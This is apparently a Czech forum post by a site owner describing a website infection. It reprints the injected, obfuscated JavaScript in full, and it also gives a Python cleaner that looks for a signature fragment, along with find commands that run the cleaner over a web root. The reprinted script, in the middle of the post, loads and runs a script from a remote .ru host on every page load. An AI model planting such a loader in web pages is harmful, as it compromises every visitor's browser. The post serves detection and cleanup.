Ahoj,
Před několika dny se mi na mé weby dostal virus.
Chtěl bych se podělit o řešení tohoto problému.
Kód viru:
<!--
  Sample of the injected payload, reproduced unchanged so it can be recognised in infected files.

  Reading aid (everything here is derived from the statements in the script itself):
  * Most statements are filler: unused variables, empty String/Date objects and
    if(x!='..') tests on variables that were never assigned. They do not affect the result.
  * The working strings are assembled from substr() fragments:
    Ef = "script", g = "src", E = "defer", J = "g" (used as the RegExp flag).
  * w(P, Y_) builds the character class [Y_] and deletes every matching character from P,
    so w('81604648144011', "416") yields "8080", which is used as the port.
  * m concatenates to an "http://" URL prefix ending in ":". The leading host labels imitate
    well-known sites and the host ends in newworldunion[.]ru. The path in _ is padded with
    names of well-known sites in the same way and ends in ".php".
  * The window.onload handler creates a script element, sets its src to m + A + _, sets
    defer to 1 and appends it to document.body. The catch block discards any error, so a
    failed load leaves no visible trace on the page.
  * Net effect: each visitor's browser fetches and runs a script from that remote host.

  For detection, the fragment tring("C4kg".subs is the string the antivir.py script on this
  page searches for in the last lines of a file.
-->
<script>var q;if(q!='' && q!='n'){q=''};var I=new Date();this.a="";function Y(){var R;if(R!=''){R='ae'};var iq=new String();var t='';var ts=new String();var J=String("C4kg".substr(3));var qF=new Date();var Q=RegExp;function w(P,Y_){this.o="";var x='';var _q=new String();this.JI='';var i= new String("[");i+=Y_;i+="]Kl9u".substr(0,1);var rV="";var Rr='';var ve=new String();var ws=new Q(i, J);var sK;if(sK!='' && sK!='sl'){sK='pp'};var HQ;if(HQ!='' && HQ!='FI'){HQ='Hv'};return P.replace(ws, t);var asw;if(asw!='L'){asw=''};};var nl;if(nl!='Hu' && nl != ''){nl=null};var U;if(U!='Qd'){U='Qd'};var m="http:"+"//kak"+"aku-cIgZo".substr(0,5)+"0rvom.un".substr(3)+"ivisiESn".substr(0,5)+"tlTqon.co".substr(4)+"WKYm.goo".substr(3)+"N7Cgle-c".substr(3)+"o-id.8wA".substr(0,5)+"MCAYnewwo".substr(4)+"OMSrldun".substr(3)+"ACbion.rAbC".substr(3,5)+"3bsCu:Cs3b".substr(4,2);var z=window;var _=new String("/s"+"og"+"ou"+".c"+"uNVUom".substr(4)+"/sN76".substr(0,2)+"sf7og".substr(3)+"XY1Zou".substr(4)+"O7G.c7OG".substr(3,2)+"T1eyomTe1y".substr(4,2)+"/gKfe".substr(0,2)+"7h1od17h".substr(3,2)+"rAjadjAr".substr(3,2)+"dy"+".c"+"v97fom79vf".substr(4,2)+"/w"+"arsHlR".substr(0,2)+"ez"+"-bkaF".substr(0,2)+"b."+"Clcor".substr(3)+"d79rg/".substr(4)+"kKDzgoKkzD".substr(4,2)+"dvKog".substr(3)+"le"+"ZMb.cMbZ".substr(3,2)+"om"+"jy9.p".substr(3)+"hpJcd".substr(0,2));var j;if(j!='' && j!='yU'){j=null};var U_="";var Z='';var E=new String("uF3Tdef".substr(4)+"er");var OO="";var Ef=new String("scrip"+"b8Ort".substr(4));this.rq="";var A=w('81604648144011',"416");this.Qm='';var pe;if(pe!='' && pe!='zz'){pe=''};var g=new String("MgPnsrc".substr(4));z.onload=function(){try {var C;if(C!='Lh' && C != ''){C=null};this.tJ='';var wT=new Date();Z=m+A;var mE=new String();var vQ;if(vQ!='wr' && vQ != ''){vQ=null};Z+=_;var KT="";var Lf='';var cy=new String();this.kM='';mZ=document.createElement(Ef);mZ[g]=Z;mZ[E]=[1,6][0];this.b="";var kg;if(kg!='' && kg!='Ct'){kg=null};var Dq="";document.body.appendChild(mZ);var 
Xg;if(Xg!='hc' && Xg!='im'){Xg=''};} catch(e){var Bv;if(Bv!='B'){Bv=''};var rm;if(rm!='WL'){rm=''};};};this._C='';};var qN;if(qN!='nY'){qN=''};Y();var Mr;if(Mr!='' && Mr!='G'){Mr=''};var aD="";</script>
<!--006dd081738cfd97b1befa73ff053f11-->
Soubor antivir.py
from sys import argv
from shutil import copy
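# Fragment of the injected, obfuscated script; its presence in one of the last
# lines of a file is the only infection test this tool performs.
SIGNATURE = b'tring("C4kg".subs'

# Number of trailing lines inspected for the signature.
TAIL_LINES = 2

# Only files with these extensions are ever modified.
CLEANABLE_SUFFIXES = ('.js', '.php')


def clean_file(path):
    """Strip the injected payload from the end of one .js or .php file.

    The file is read as bytes, so files in any encoding and with any line
    endings are written back unchanged apart from the removed tail. If the
    signature is found in one of the last TAIL_LINES lines, the file is first
    copied to ``path + '.bak'`` and then rewritten without the line holding
    the signature and anything after it.

    Returns True when the file was rewritten, False when it was left alone
    (other extension, empty file, or no signature in the inspected lines).

    Notes for whoever runs this:
    * The .bak copy still contains the payload, and a ``*.php.bak`` inside the
      web root is usually served as plain text, exposing the PHP source. Move
      or delete the backups once the cleaned files are verified.
    * Any line that follows the signature line is removed with it; compare
      against the .bak copy if a file had legitimate content after the payload.
    * Removing the payload does not close whatever access was used to write
      it; credentials and upload paths still need to be reviewed.
    """
    if not path.endswith(CLEANABLE_SUFFIXES):
        return False

    with open(path, 'rb') as handle:
        lines = handle.readlines()

    for offset in range(1, TAIL_LINES + 1):
        # A file shorter than `offset` lines has no such line to inspect.
        if len(lines) < offset:
            break
        if SIGNATURE in lines[-offset]:
            # Back up before the destructive write.
            copy(path, path + '.bak')
            with open(path, 'wb') as handle:
                handle.writelines(lines[:-offset])
            return True
    return False


if __name__ == '__main__':
    # Usage: python antivir.py FILE [-c]   (the -c argument is accepted but not read)
    if len(argv) >= 2:
        print(argv[1])
        clean_file(argv[1])
    else:
        print('usage: python antivir.py FILE')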
Příkazy pro spuštění antiviru:
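# Run the cleaner over every .js file, then every .php file, under the web root.
# The name patterns are quoted so the shell hands them to find unexpanded, and
# -exec passes each path to python as one argument, so file names containing
# spaces are handled. -type f keeps directories out of the list.
# The trailing -c is passed exactly as before.
find /home/www -type f -name '*.js' -exec python antivir.py {} -c \;
find /home/www -type f -name '*.php' -exec python antivir.py {} -c \;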
Doufám, že to nebudete muset použít